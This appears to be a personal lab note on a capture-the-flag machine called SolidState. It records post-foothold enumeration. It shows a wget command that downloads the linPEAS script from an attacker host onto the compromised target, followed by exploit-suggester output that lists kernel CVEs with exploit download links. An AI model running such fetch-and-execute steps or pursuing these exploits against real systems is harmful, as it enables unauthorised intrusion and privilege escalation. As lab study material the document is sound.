InfoSec LAB

SolidState_Automated

Created: 1 min read

PEAS

After gaining a foothold and running some basic enumeration, I decide to run PEAS

${debian_chroot:+($debian_chroot)}mindy@solidstate:/dev/shm$ wget http://10.10.14.5:8000/linpeas.sh ; chmod 777 linpeas.sh
4.5:8000/linpeas.sh ; chmod 777 linpeas.sh
--2023-01-17 23:51:19--  http://10.10.14.5:8000/linpeas.sh
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: ‘linpeas.sh’
 
linpeas.sh          100%[===================>] 808.42K  4.13MB/s    in 0.2s    
 
2023-01-17 23:51:20 (4.13 MB/s) - ‘linpeas.sh’ saved [827827/827827]

I transferred the PEAS over HTTP

Executing PEAS

The target system is vulnerable to CVE-2021-4034 

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2017-16995] eBPF_verifier
 
   details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   exposure: probable
   tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   download url: https://www.exploit-db.com/download/45010
   comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
 
[+] [CVE-2021-4034] PwnKit
 
   details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   exposure: probable
   tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   download url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   exposure: less probable
   tags: ubuntu=20.04{kernel:5.8.0-*}
   download url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-6074] dccp
 
   details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   exposure: less probable
   tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   download url: https://www.exploit-db.com/download/41458
   comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

Some more vulnerabilities discovered by PEAS

Printer?

More detailed view on binaries with the SUID permission set There are a few that I could try out..

Interactive Graph View

Backlinks